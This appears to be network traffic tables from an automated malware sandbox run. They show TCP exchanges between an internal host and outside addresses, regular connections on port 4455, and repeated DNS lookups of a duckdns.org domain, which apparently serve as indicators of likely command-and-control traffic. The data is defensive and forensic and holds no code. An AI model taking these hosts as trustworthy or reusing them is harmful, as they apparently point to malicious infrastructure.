Oct 1, 2024 06:29:58.035634995 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.035645008 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.035672903 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.035706997 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.035720110 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.035743952 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.035790920 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.153285980 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153366089 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153400898 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153446913 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153484106 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153546095 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.153546095 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.153572083 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153606892 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153630972 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.153640032 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153673887 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153692007 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.153713942 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153747082 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.153770924 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154123068 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154153109 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154180050 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154206991 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154241085 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154262066 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154272079 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154305935 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154328108 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154341936 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154392958 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154606104 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154638052 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154671907 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154691935 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154704094 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154736996 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154759884 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154853106 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.154913902 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.154999018 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.155031919 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.155080080 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.155092001 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.155128956 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.155163050 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.155184031 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.156641006 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.161591053 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.377931118 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.377969027 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378001928 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378052950 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378084898 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378098011 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378119946 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378139973 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378155947 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378181934 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378190994 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378226042 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378259897 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378274918 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378321886 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378361940 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378416061 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378469944 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378474951 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378520012 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378554106 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378573895 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378586054 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378638029 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378874063 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378925085 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378961086 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.378978968 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.378993988 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379026890 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379048109 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379060030 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379115105 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379323959 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379374027 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379422903 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379440069 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379456997 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379488945 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379506111 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379522085 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379554033 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379585028 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379589081 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379664898 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379879951 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379934072 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.379975080 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.379982948 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380033016 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380064964 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380079985 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380098104 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380131006 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380143881 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380165100 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380196095 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380213022 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380251884 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380285978 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380296946 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380820990 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380856037 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380865097 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380888939 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380934954 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.380939960 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.380973101 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381022930 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381028891 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.381056070 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381088972 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381100893 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.381122112 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381155968 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381165981 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.381191015 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381234884 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.381798983 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381850958 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381886005 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381899118 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.381920099 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381954908 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.381966114 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.426542997 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.484679937 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:30:18.973164082 CEST | 49737 | 4455 | 192.168.2.4 | 89.117.23.22
Oct 1, 2024 06:30:18.978060961 CEST | 4455 | 49737 | 89.117.23.22 | 192.168.2.4
Oct 1, 2024 06:30:18.978147030 CEST | 49737 | 4455 | 192.168.2.4 | 89.117.23.22
Oct 1, 2024 06:30:18.988738060 CEST | 49737 | 4455 | 192.168.2.4 | 89.117.23.22
                                            Oct 1, 2024 06:30:18.993608952 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.580396891 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.586956024 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:19.591903925 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.765727043 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.817204952 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.027303934 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.032136917 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:20.032202005 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.036998034 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.252516985 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.301619053 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:30.387494087 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.442240000 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.005526066 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.010627031 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.010696888 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.015693903 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.296649933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.348483086 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.434318066 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.436242104 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.441204071 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.441277981 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.446212053 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:41.990216970 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:41.995178938 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:41.995242119 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.000832081 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.281076908 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.332992077 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.416698933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.418085098 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.422960043 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.423017025 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.427918911 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:52.973963022 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:52.978959084 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:52.979027033 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:52.983863115 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.264847994 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.317286968 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.396378994 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.398396969 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.403215885 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.405535936 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.410381079 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.568073034 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.614227057 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:00.700404882 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.754822969 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.959043980 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.964155912 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:03.964222908 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.969046116 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.249217987 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.301904917 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.372582912 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.374329090 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.379101992 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.379163980 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.383941889 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:14.942842960 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:14.948735952 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:14.948828936 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:14.954965115 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.233608961 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.286077023 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.364383936 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.376868010 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.381768942 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.381834984 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.386687040 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:25.927169085 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:25.932101011 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:25.932195902 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:25.936961889 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.217648983 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.270468950 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.348408937 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.349807978 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.354722023 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.354774952 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.359561920 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.251924992 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.312122107 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:30.380372047 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.426934958 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.911545038 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.916580915 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:36.916661024 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.921521902 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.371934891 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.371994019 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.372060061 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.373780966 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.378608942 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.378667116 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.383486986 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:47.895967007 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:47.900800943 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:47.900854111 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:47.906090021 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.404901028 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.458043098 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.529556036 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.531080008 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.535800934 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.535859108 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.540693045 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:58.880368948 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:58.885283947 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:58.885371923 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:58.890121937 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.169656038 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.223838091 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.300406933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.302383900 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.307199001 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.307259083 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.312202930 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.251276016 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.302000999 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:00.380201101 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.427154064 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.645917892 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.651891947 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.653124094 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.658058882 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.935607910 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.989398003 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.061403036 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:07.062181950 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.066976070 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:07.067034006 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.072742939 CEST44554973789.117.23.22192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 06:30:00.822993040 CEST | 50432 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:01.837419987 CEST | 50432 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:02.833076000 CEST | 50432 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:04.832156897 CEST | 53 | 50432 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:04.832178116 CEST | 53 | 50432 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:04.832190037 CEST | 53 | 50432 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:09.849304914 CEST | 55420 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:10.848870039 CEST | 55420 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:11.864970922 CEST | 55420 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:13.859914064 CEST | 53 | 55420 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:13.859946012 CEST | 53 | 55420 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:13.859977961 CEST | 53 | 55420 | 1.1.1.1 | 192.168.2.4
Oct 1, 2024 06:30:18.864885092 CEST | 56771 | 53 | 192.168.2.4 | 1.1.1.1
Oct 1, 2024 06:30:18.970983028 CEST | 53 | 56771 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 1, 2024 06:30:00.822993040 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8ce | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:01.837419987 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8ce | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:02.833076000 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8ce | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:09.849304914 CEST | 192.168.2.4 | 1.1.1.1 | 0x1708 | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:10.848870039 CEST | 192.168.2.4 | 1.1.1.1 | 0x1708 | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:11.864970922 CEST | 192.168.2.4 | 1.1.1.1 | 0x1708 | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 1, 2024 06:30:18.864885092 CEST | 192.168.2.4 | 1.1.1.1 | 0x7b10 | Standard query (0) | dczas.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 1, 2024 06:30:04.832156897 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8ce | Server failure (2) | dczas.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
